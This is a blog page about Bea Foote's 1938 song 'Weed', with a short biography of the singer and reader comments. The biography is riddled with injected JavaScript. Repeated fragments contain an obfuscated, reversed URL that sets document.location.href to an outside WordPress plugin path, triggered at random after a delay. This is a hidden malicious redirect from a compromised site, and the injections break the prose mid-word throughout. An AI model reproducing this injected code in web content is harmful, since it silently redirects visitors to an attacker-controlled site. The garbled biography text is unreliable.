Bea Foote – Weed (1938)

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Flashbacks 1920’s – 1940’s Novelty Songs Of An Era Long Gone Bye. Reefer Songs. With a name that sounds like the mumblings of a beginning English student, the slight career of Bea Foote will tempt punsters toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to make cracks about her being just a Foote-note in blues histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory. And on the subject of temptation, this artist’s choice of subject matter for songs — primarily reefer and sex — would not make her the kind of gal you’d want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bring home toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mother, unless mom was Bessie Smith, of course. The latter artist is certainly the most famous artist in this style that also includes greats such as Alberta Hunter and Ethel Waters. While the Foote-hold on success can’t be compared toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to these performers, technically she was one of the better singers in the style, boasting a particularly strong vibratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to that she put toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to good use in her recordings with bluesman Sammy Price. The popularity of anthology collections focusing on sexy blues songs have provided a regular outlet for some of her material on a variety of labels, yet even this lucrative market is threatening toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be smoked out, so toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to speak, by an incredible wave of enthusiasm for marijuana songs that began sometime in the mid-’90s, perhaps as an adjunct toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the War on Drugs. Foote’s song “Weed” has long been considered one of the best, and the latest puff of interest in this subject has included not only reissues on labels such as Stash of her own recording of the song, but a cover version as well by the pot-obsessed Exit 13 band.
Bea Foote is away with the fairies as she extoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tols the joys of smoking “Weeds, weeds, weeds all day long”. Check Out her dirty blues stuff as well. With Charlie Shavers.

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24 thoughts on “Bea Foote – Weed (1938)”

  1. manfromarcadia says:

    this songs amazing

  2. suavitel fabric softener says:

    the girl in the picture is hot

  3. Wisper714 says:

    Lady Gagas mom?. ^-^

  4. opnwndo says:

    why did they put pot in tobbacco cans back then?—–they didn't have baggies.

  5. Professor Tiki's Curiosity Channel says:

    gruenekraft

    Here you can get the entire double CD.

  6. Aliçia Ayala says:

    weed, weed, weed, weed all day long.

  7. marseye05 says:

    Will always love this song.

  8. D4yDre4mer says:

    absolutely one of my all time favourites

  9. ferdinandthecrow says:

    The revival of interest in these tunes began long before the 90s, the late 70s would be closer

  10. Noble Nemesis says:

    +suavitel fabric softener Was, at least .xD

  11. tominrochester says:

    @opnwndo- plastic bags weren't around until the 50s, and this is from the late 30s, so you are correct.  

  12. phoenix rising says:

    Who's on the pickie?

  13. Leafyr Oakfyst says:

    Hah! Dude you rock. That about writing.. 😉 Skillz.

  14. Matt Dulch says:

    Undoubtedly one of the very best…

  15. noslohcinkin says:

    I think I'm gonna send myself…..

  16. Flesh Robe says:

    ⬅️Yes. Look at my picture.

  17. Rawblah says:

    all day long

  18. Sarah Gray says:

    Hi there! I'm your Number One Fan!

  19. 420 Monster says:

    Good old fashion beauty there.

  20. TheEaterofPumpkins says:

    Same girl, same.

  21. Patrick George says:

    What A Voice-melody unusual……..cooool!!!!!

  22. chris westley says:

    shout out to MEZZ MEZZROW ALL Vipers

  23. Isak Lytting says:

    This is my favourite of the old viper songs. Actually, one of my favourite songs, period. Bea Foote, you gotta love that name. I just think this song is beautiful – when the finally begins singing – it's sooooo beautiful, and it takes my breath away – and I ain't even smoking now!

    The melody… its so beautiful, so kind, so wonderful…

    I wish I knew who wrote it. And that there was a better recording of it.. I first heard this, I think, on the Fitz Hugh Ludlow online library of old texts on Drugs, where I think there was a small collection of old viper songs.

  24. Cool Can’t says:

    Does anybody have a link to the official lyrics, or at least the correct ones? I love this song, but its an old recording and sometimes words get jumbled.

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